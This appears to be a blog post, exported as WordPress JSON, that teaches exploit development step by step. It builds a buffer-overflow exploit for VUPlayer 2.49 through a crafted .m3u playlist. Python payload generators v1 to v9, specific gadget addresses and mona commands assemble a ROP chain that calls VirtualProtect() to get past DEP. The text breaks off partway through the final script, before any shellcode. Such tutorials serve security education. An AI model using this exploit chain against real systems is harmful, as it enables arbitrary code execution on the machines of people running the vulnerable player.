{"id":168,"date":"2022-01-24T21:24:07","date_gmt":"2022-01-24T20:24:07","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=168"},"modified":"2022-01-24T21:24:49","modified_gmt":"2022-01-24T20:24:49","slug":"rop-gadgets-virtualprotect","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2022\/01\/24\/rop-gadgets-virtualprotect\/","title":{"rendered":"ROP Gadgets: VirtualProtect()"},"content":{"rendered":"\n<p>For this article we&#8217;ll work on VUPlayer 2.49 (Windows 7), the &#8216;.m3u&#8217; local buffer overflow, and bypass DEP with a ROP chain that calls VirtualProtect(). The scripts are Python 2, where <code>str<\/code> is a byte string, so the output of <code>struct.pack<\/code> concatenates directly with the padding; under Python 3 every literal would have to be <code>bytes<\/code>.<\/p>\n\n\n\n<h3>Initial exploit v1: EIP Control<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><code>import sys<br>import struct<br>import os<br><br>crash_file = \"test.m3u\"<br><br># 1012 bytes of padding reach the saved return address; the next 4 bytes end up in EIP<br>fuzz = \"A\" * 1012<br>fuzz += \"B\" * 4<br>fuzz += \"C\" * (3000 - len(fuzz))<br><br># binary mode: the payload is raw bytes, not text<br>file = open(crash_file, \"wb\")<br>file.write(fuzz)<br>file.close()<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Start the application and attach Immunity Debugger to it.<\/p>\n\n\n\n<p>Drag the .m3u file onto the application: it crashes with EIP overwritten by 42424242, our four B&#8217;s, which confirms the offset of 1012 bytes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"627\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1024x627.png\" alt=\"\" class=\"wp-image-174\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1024x627.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-300x184.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-768x471.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1536x941.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-2048x1255.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1568x961.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>With DEP on, returning straight into the stack is not an option, so every address in the chain has to come from a module that is not rebased by ASLR. Look for modules with ASLR disabled: !mona
modules<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"538\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1024x538.png\" alt=\"\" class=\"wp-image-172\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1024x538.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-300x158.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-768x404.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1536x807.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-2048x1076.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1568x824.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>!mona modules lists the BASS libraries shipped with VUPlayer (bass.dll, basswma.dll and bassmidi.dll) as modules without ASLR and without rebasing, so their addresses are stable from run to run and they are our gadget source. We&#8217;ll pick one address to start with: 0x10101008<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"111\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1024x111.png\" alt=\"\" class=\"wp-image-169\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1024x111.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-300x33.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-768x84.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1536x167.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1568x171.png 1568w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image.png 1746w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>0x10101008 is a RETN instruction in BASSWMA. Overwriting EIP with it is the ROP entry point: the RETN pops the next dword we control into EIP, so from here on the stack drives execution one gadget at a time. A bare RETN is also a ROP NOP, which is why the same address reappears as filler later on.<\/p>\n\n\n\n<p>Set a breakpoint at 0x10101008 and regenerate the m3u file with the following script:<\/p>\n\n\n\n<h3>The exploit v2<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><code>import sys<br>import struct<br>import os<br><br>crash_file = \"vuplayer-dep.m3u\"<br><br>fuzz = \"A\" * 1012<br># 0x10101008 (RETN in basswma.dll) little-endian, four times: one for EIP and three ROP NOPs after it<br>fuzz += \"\\x08\\x10\\x10\\x10\" * 4<br>fuzz += \"C\" * (3000 - len(fuzz))<br><br>file = open(crash_file, \"wb\")<br>file.write(fuzz)<br>file.close()<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>We hit the breakpoint at the RETN address now in EIP:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"168\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1024x168.png\" alt=\"\" class=\"wp-image-170\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1024x168.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-300x49.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-768x126.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1536x253.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1568x258.png 1568w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1.png 1666w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>API Calls<\/h3>\n\n\n\n<p>To see which API pointers the non-ASLR modules give us for bypassing DEP, run <code>!mona ropfunc<\/code>.<\/p>\n\n\n\n<p>Check the results in ropfunc.txt.<\/p>\n\n\n\n<p>We&#8217;ll use VirtualProtect(): the results show an import (IAT) pointer to it in one of the modules. Calling it on the stack region with PAGE_EXECUTE_READWRITE makes our payload executable without switching DEP off for the process.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"642\" height=\"296\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4.png\" alt=\"\" class=\"wp-image-173\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4.png 642w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4-300x138.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" \/><\/figure>\n\n\n\n<h3>VirtualProtect Function<\/h3>\n\n\n\n<figure
class=\"wp-block-table\"><table><tbody><tr><td>BOOL WINAPI VirtualProtect( =&gt; ESI: pointer to VirtualProtect(), read from its IAT slot<br>(return address) =&gt; EBP: where VirtualProtect() returns to, a JMP ESP<br>_In_ LPVOID lpAddress, =&gt; ESP: start of the region to change, i.e. our stack<br>_In_ SIZE_T dwSize, =&gt; EBX: dwSize (0x201)<br>_In_ DWORD flNewProtect, =&gt; EDX: flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)<br>_Out_ PDWORD lpflOldProtect =&gt; ECX: a writable pointer that receives the old protection<br>);<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>The call frame is built with a single PUSHAD instead of pushing the arguments one by one. PUSHAD pushes EAX, ECX, EDX, EBX, the original ESP, EBP, ESI and EDI in that order, so the register pushed last (EDI) ends up at the lowest address and is consumed first. Read from low to high, the eight dwords are: ROP NOP, VirtualProtect() pointer, return address, lpAddress, dwSize, flNewProtect, lpflOldProtect, NOPs. That is exactly the stdcall frame VirtualProtect() expects, which is why the registers are assigned in what looks like reverse order.<\/p>\n\n\n\n<h3>The plan:<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td># EAX 90909090 =&gt; Nop (execution lands here after VirtualProtect() returns)<br># ECX &lt;writeable pointer&gt; =&gt; lpflOldProtect<br># EDX 00000040 =&gt; flNewProtect<br># EBX 00000201 =&gt; dwSize<br># ESP ???????? =&gt; Leave as is: PUSHAD stores the current ESP, which becomes lpAddress<br># EBP ???????? =&gt; Return address: a JMP ESP (or CALL ESP, PUSH ESP # RETN, ...)<br># ESI ???????? =&gt; Pointer to VirtualProtect, i.e. the DWORD stored at 0x1060E25C<br># EDI 10101008 =&gt; ROP NOP (RETN), the same address we used for EIP<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EAX<\/h3>\n\n\n\n<p>First, generate rop.txt and rop_suggestions.txt from the three non-ASLR modules with the following command:<\/p>\n\n\n\n<p><code>!mona rop -m \"basswma,bassmidi,bass\"<\/code><\/p>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<ul><li>for EAX, we need 0x90909090: four NOPs, and a dword with no bad characters<\/li><li>put that value on the stack right after the gadget address<\/li><li>then pop it with a POP EAX # RETN gadget<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>rop_suggestions.txt has a section for pop eax.<\/p>\n\n\n\n<p>We&#8217;ll select the simplest one, a bare POP EAX # RETN: 0x10015fe7<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"139\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-1024x139.png\" alt=\"\" class=\"wp-image-171\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-1024x139.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-300x41.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-768x104.png 768w,
https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2.png 1426w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>The exploit v3<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack('&lt;L', 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack('&lt;L', 0x90909090) # value popped into EAX<br>rop = eax<br><br>fuzz = \"A\" * 1012<br>fuzz += \"\\x08\\x10\\x10\\x10\" # 10101008 &lt;- pointer to a RETN, the chain starts here<br>fuzz += rop<br>fuzz += \"C\" * (3000 - len(fuzz))<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Create the file and check in the debugger that EAX holds 90909090 once the gadget has run:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"850\" height=\"566\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6.png\" alt=\"\" class=\"wp-image-175\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6.png 850w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6-300x200.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6-768x511.png 768w\" sizes=\"(max-width: 850px) 100vw, 850px\" \/><\/figure>\n\n\n\n<h3>ECX<\/h3>\n\n\n\n<p><strong><em># ECX &lt;writeable pointer&gt; =&gt; lpflOldProtect<\/em><\/strong><\/p>\n\n\n\n<p>VirtualProtect() writes the previous protection to lpflOldProtect, so ECX must hold an address that is writable, otherwise the call fails with an access violation. Open the memory map in Immunity (Alt+M) and choose a section of one of the non-ASLR DLLs whose access column shows RW or RWE.<\/p>\n\n\n\n<p>The BASSWMA section at 10101000 is marked RWE.<\/p>\n\n\n\n<p>Double-click it and pick an address holding zeros that nothing else appears to use, with no bad characters in the address itself: <strong>101053DC<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"309\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-1024x309.png\" alt=\"\" class=\"wp-image-176\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-1024x309.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-300x90.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-768x232.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7.png 1386w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Then look for a POP ECX # RETN gadget in rop_suggestions.txt: 0x10601007<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"186\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-1024x186.png\" alt=\"\" class=\"wp-image-177\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-1024x186.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-300x55.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-768x140.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8.png 1308w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>The exploit v4<\/h3>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack('&lt;L', 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack('&lt;L', 0x90909090)<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack('&lt;L',
0x10601007) # pointer to # POP ECX # RETN<br>ecx += struct.pack('&lt;L', 0x101053DC) # a writable pointer<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div><\/div>\n\n\n\n<h3>EDX<\/h3>\n\n\n\n<p><strong><em># EDX 00000040 =&gt; flNewProtect<\/em><\/strong><\/p>\n\n\n\n<p>We can&#8217;t simply pop 0x40 into EDX: the dword 0x00000040 is three null bytes and a 0x40, and a null byte in the .m3u line cuts the payload short, so the value can never sit on the stack as an immediate. The ROP results also give us no direct way to load EDX, so we need to be creative and build the value in EAX first:<\/p>\n\n\n\n<ul><li>Zero out EAX: # XOR EAX,EAX # RETN (0x106074f8)<\/li><li>add 4 to EAX until it reaches 0x40: 16 times # ADD EAX,4 # RETN (0x10014474)<\/li><li>swap EAX and EDX so that EDX holds the target value: # XCHG EAX,EDX # RETN (0x10038a6c)<\/li><\/ul>\n\n\n\n<h3>The exploit v5<\/h3>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack('&lt;L', 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack('&lt;L', 0x90909090)<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack('&lt;L', 0x10601007) # pointer to # POP ECX # RETN<br>ecx += struct.pack('&lt;L', 0x101053DC) # a writable pointer<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack('&lt;L', 0x106074f8) # XOR EAX,EAX # RETN<br>edx += struct.pack('&lt;L', 0x10014474) * 16 # ADD EAX,4 # RETN, sixteen times: EAX = 0x40<br>edx += struct.pack('&lt;L', 0x10038a6c) # XCHG EAX,EDX # RETN<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div><\/div>\n\n\n\n<h3>EBX<\/h3>\n\n\n\n<p><strong><em># EBX 00000201 =&gt; dwSize<\/em><\/strong><\/p>\n\n\n\n<p>0x00000201 has the same null-byte problem, and we couldn&#8217;t find a way to load EBX directly, so we go through EAX again.<\/p>\n\n\n\n<p>First we need a way to move the value across: # XCHG EAX,EBX # RETN (0x10032f32)<\/p>\n\n\n\n<p>We also found a gadget that XORs EAX with a static value, which lets us derive a null-free dword from one that contains nulls.<\/p>\n\n\n\n<p>Remember:<\/p>\n\n\n\n<ul><li>a XOR b = c<\/li><li>b XOR c = a<\/li><li>c XOR a = b<\/li><\/ul>\n\n\n\n<p>So if we do the math:<\/p>\n\n\n\n<ul><li><strong><em>0x201 XOR 994803BD = 994801BC (in hexadecimal)<\/em><\/strong><\/li><li><strong><em>994801BC XOR 994803BD = 0x201<\/em><\/strong><\/li><\/ul>\n\n\n\n<p>Online calculator: <a href=\"https:\/\/miniwebtool.com\/bitwise-calculator\/?data_type=16&amp;number1=994803bd&amp;number2=00000201&amp;operator=XOR\">here<\/a><\/p>\n\n\n\n<p>So our plan is:<\/p>\n\n\n\n<ul><li>POP 0x994801BC into EAX (no null bytes, so it can sit on the stack)<\/li><li>XOR it with the static value 994803BD, which leaves 0x201 in EAX<\/li><li>swap EAX and EBX<\/li><\/ul>\n\n\n\n<h3>The exploit v6<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX, ECX and EDX chunks unchanged from v5<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack('&lt;L', 0x10015fe7) # POP EAX # RETN<br>ebx += struct.pack('&lt;L', 0x994801bc) # once XOR'd with the static value 994803BD, this becomes 0x201<br>ebx += struct.pack('&lt;L', 0x1003a074) # XOR EAX,994803BD # RETN<br>ebx += struct.pack('&lt;L', 0x10032f32) # XCHG EAX,EBX # RETN 0x00<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EBP<\/h3>\n\n\n\n<p><strong><em># EBP ????????
=&gt; Call to ESP (jmp, call, push,..)<\/em><\/strong><\/p>\n\n\n\n<p>EBP becomes the return address of the VirtualProtect() call, so it must point to a JMP ESP: when the function returns (RETN 0x10, which also removes the four arguments), ESP points at the NOPs we loaded into EAX, and the jump lands execution on the stack that has just been made executable. VirtualProtect() works on whole pages, so the NOP dword sitting just below lpAddress is normally covered as well.<\/p>\n\n\n\n<p>Found a JMP ESP at 1010539F with the following command (\\xff\\xe4 is the opcode of JMP ESP):<\/p>\n\n\n\n<p><strong>!mona find -s '\\xff\\xe4' -m \"basswma,bassmidi,bass\"<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"89\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1024x89.png\" alt=\"\" class=\"wp-image-178\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1024x89.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-300x26.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-768x67.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1536x133.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-2048x178.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1568x136.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now we need a gadget to pop it into EBP.<\/p>\n\n\n\n<p>I found # POP EBP # RETN 0x04 (0x10017c0d). We can use it, but we need to compensate for the RETN 0x04: unlike a plain RETN it adds 4 to ESP after popping the return address, so the dword following the return target is skipped.<\/p>\n\n\n\n<p>We handle this with RETN gadgets (ROP NOPs, 10101008) as filler: the first one is the address RETN 0x04 returns to, the second is the dword it steps over, and either way the chain resumes at the next gadget.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"576\" height=\"46\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10.png\" alt=\"\" class=\"wp-image-179\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10.png 576w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10-300x24.png 300w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<h3>The exploit v7<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX, ECX, EDX and EBX chunks unchanged from v6<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack('&lt;L', 0x10017c0d) # POP EBP # RETN 0x04<br>ebp += struct.pack('&lt;L', 0x1010539F) # pointer to JMP ESP<br>ebp += struct.pack('&lt;L', 0x10101008) # ROP NOP: the RETN 0x04 returns here<br>ebp += struct.pack('&lt;L', 0x10101008) # ROP NOP: the 4 bytes RETN 0x04 skips over<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>ESI<\/h3>\n\n\n\n<p># ESI ????????
=&gt; PTR to VirtualProtect &#8211; DWORD PTR of 0x1060E25C<\/p>\n\n\n\n<p>The memory address of the API call VirtualProtect is already known: 0x1060E25C<\/p>\n\n\n\n<p>We need the&nbsp;DWORD&nbsp;value stored there<\/p>\n\n\n\n<p>We couldn&#8217;t find a gadget for ESI so we&#8217;ve checked with EAX again:<\/p>\n\n\n\n<p><strong><em>Plan:<\/em><\/strong><\/p>\n\n\n\n<ul><li>POP\u00a0pointer to API into EAX<\/li><li>move the\u00a0DWORD\u00a0value held at the address into EAX (load the content of\u00a0[EAX]\u00a0into\u00a0EAX) &#8211;> # MOV EAX,DWORD PTR DS:[EAX] # RETN<\/li><li>exchange EAX into ESI (# XCHG EAX,ESI # RETN on 0x10030950)<\/li><\/ul>\n\n\n\n<h3>The exploit v8<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += 
struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 
0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EDI<\/h3>\n\n\n\n<p># EDI 10101008 =&gt; ROP-Nop same as EIP<\/p>\n\n\n\n<p>find a pointer to\u00a0# POP EDI # RETN (0x100190b0) and load the value\u00a010101008\u00a0\u00a0on it<\/p>\n\n\n\n<p>At the end, we also add a&nbsp;PUSHAD&nbsp;gadget to push all of the register values (EAX,ECX,DEX,EBX,ESP,EBP,ESI,EDI) onto the stack and set up our API call.<\/p>\n\n\n\n<h3>The exploit v9<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += 